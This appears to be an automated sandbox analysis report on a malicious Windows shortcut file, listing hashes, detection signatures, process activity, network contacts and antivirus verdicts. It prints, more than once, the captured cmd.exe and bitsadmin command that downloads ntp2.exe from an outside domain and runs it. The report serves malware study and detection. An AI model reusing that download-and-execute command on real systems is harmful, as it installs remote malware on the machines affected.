Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Sept. 27, 2023, 10:39 a.m.	Sept. 27, 2023, 10:41 a.m.

Size	2.0KB
Type	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=4, Archive, ctime=Wed Oct 6 04:31:17 2021, mtime=Sat Sep 23 13:05:22 2023, atime=Wed Oct 6 04:31:17 2021, length=236544, window=hide
MD5	`43efb83e1d56e903d06ed74df2a5f859`
SHA256	`7829789bb0290ad34295531e1fb55c2bcedf839062fddd1ddaf98852ad5a5419`
CRC32	`538705B5`
ssdeep	`24:83kWJ3q3c/wT+MacqJM9BGPJ+/omxdd2sZDjWC4o085CwdRqaqNp1deOm:8Uc3DzcqJwG4msZDjW9ojRI1gO`
Yara	Lnk_Format_Zero - LNK Format lnk_file_format - Microsoft Windows Shortcut File Format Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "DatzzQSVGowlEQwT" C:\Users\test22\AppData\Local\Temp\Payload.lnk
3032
- cmd.exe "C:\Windows\System32\cmd.exe" /C bitsadmin /transfer Update /download /priority FOREGROUND https://recipemedical.com/archive/ntp2.exe C:\Users\test22\AppData\Local\Temp\ntp2.exe' & start C:\Users\test22\AppData\Local\Temp\ntp2.exe'
  2188
  - bitsadmin.exe bitsadmin /transfer Update /download /priority FOREGROUND https://recipemedical.com/archive/ntp2.exe C:\Users\test22\AppData\Local\Temp\ntp2.exe'
    200

Name	Response	Post-Analysis Lookup
recipemedical.com	A 45.15.157.175	45.15.157.175

IP Address	Status	Action
164.124.101.2	Active	Moloch
45.15.157.175	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Command line console output was observed (35 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: BITSADMIN version 3.0 [ 7.5.7601 ] console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: BITS administration utility. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: (C) Copyright 2000-2006 Microsoft Corp. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: DISPLAY: ' console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: Update' console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: TYPE: console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: DOWNLOAD console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: STATE: console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: CONNECTING console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: PRIORITY: console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: FOREGROUND console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: FILES: console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: BYTES: console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: 0 / UNKNOWN console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: TRANSFER RATE: console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: 0.00 B/S console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: DISPLAY: ' console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: Update' console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: TYPE: console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: DOWNLOAD console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: STATE: console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: TRANSIENT_ERROR console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: PRIORITY: console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: FOREGROUND console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: FILES: console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: BYTES: console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: 0 / UNKNOWN console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: ERROR FILE: console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: https://recipemedical.com/archive/ntp2.exe -> C:\Users\test22\Ap console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: ERROR CODE: console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: 0x80072ee2 - 작업 시간을 초과했습니다. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: ERROR CONTEXT: console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: 0x00000005 - 원격 파일을 처리하는 동안 오류가 발생했습니다. console_handle: 0x00000007	1	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\Payload.lnk

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\cmd.exe" /C bitsadmin /transfer Update /download /priority FOREGROUND https://recipemedical.com/archive/ntp2.exe C:\Users\test22\AppData\Local\Temp\ntp2.exe' & start C:\Users\test22\AppData\Local\Temp\ntp2.exe'

Yara rule detected in process memory (9 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

BITSAdmin Tool has been invoked to download a file

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3032 resumed a thread in remote process 2188
NtResumeThread Sept. 27, 2023, 10:39 a.m.	thread_handle: 0x00000338 suspend_count: 1 process_identifier: 2188	1	0	0

Uses suspicious command line tools or Windows utilities (2 events)

cmdline	bitsadmin /transfer Update /download /priority FOREGROUND https://recipemedical.com/archive/ntp2.exe C:\Users\test22\AppData\Local\Temp\ntp2.exe'
cmdline	"C:\Windows\System32\cmd.exe" /C bitsadmin /transfer Update /download /priority FOREGROUND https://recipemedical.com/archive/ntp2.exe C:\Users\test22\AppData\Local\Temp\ntp2.exe' & start C:\Users\test22\AppData\Local\Temp\ntp2.exe'

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

45.15.157.175:443

File has been identified by 30 AntiVirus engines on VirusTotal as malicious (30 events)

Lionic	Trojan.WinLNK.Bitsuh.4!c
CAT-QuickHeal	LNK.Exploit.Gen
ALYac	Heur.BZC.YAX.Pantera.23.179DB6BB
Cyren	LNK/Bitsldr.B!Camelot
Symantec	Trojan.Gen.NPE.C
ESET-NOD32	BAT/TrojanDownloader.Agent.OWA
Avast	Other:Malware-gen [Trj]
Kaspersky	HEUR:Trojan.Multi.Bitsuh.a
BitDefender	Heur.BZC.YAX.Pantera.23.1941B292
MicroWorld-eScan	Heur.BZC.YAX.Pantera.23.1941B292
Rising	Downloader.BitsAdmin/LNK!1.BAE7 (CLASSIC)
Emsisoft	Heur.BZC.YAX.Pantera.23.1941B292 (B)
F-Secure	Trojan:W32/LnkGen.C
VIPRE	Heur.BZC.YAX.Pantera.23.1941B292
TrendMicro	HEUR_LNKEXEC.A
McAfee-GW-Edition	BehavesLike.Trojan.xx
FireEye	Heur.BZC.YAX.Pantera.23.1941B292
Sophos	Mal/DownLnk-F
Ikarus	Win32.Outbreak
GData	Heur.BZC.YAX.Pantera.23.1941B292
Arcabit	Heur.BZC.YAX.Pantera.23.1941B292 [many]
ZoneAlarm	HEUR:Trojan.Multi.Bitsuh.a
Microsoft	Trojan:Win32/Znyonm
Google	Detected
McAfee	Downloader-FBRQ!43EFB83E1D56
MAX	malware (ai score=80)
VBA32	Trojan.Link.DoubleRun
Zoner	Probably Heur.LNKScript
Tencent	Bat.Trojan-Downloader.Der.Qqil
AVG	Other:Malware-gen [Trj]

Payload.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All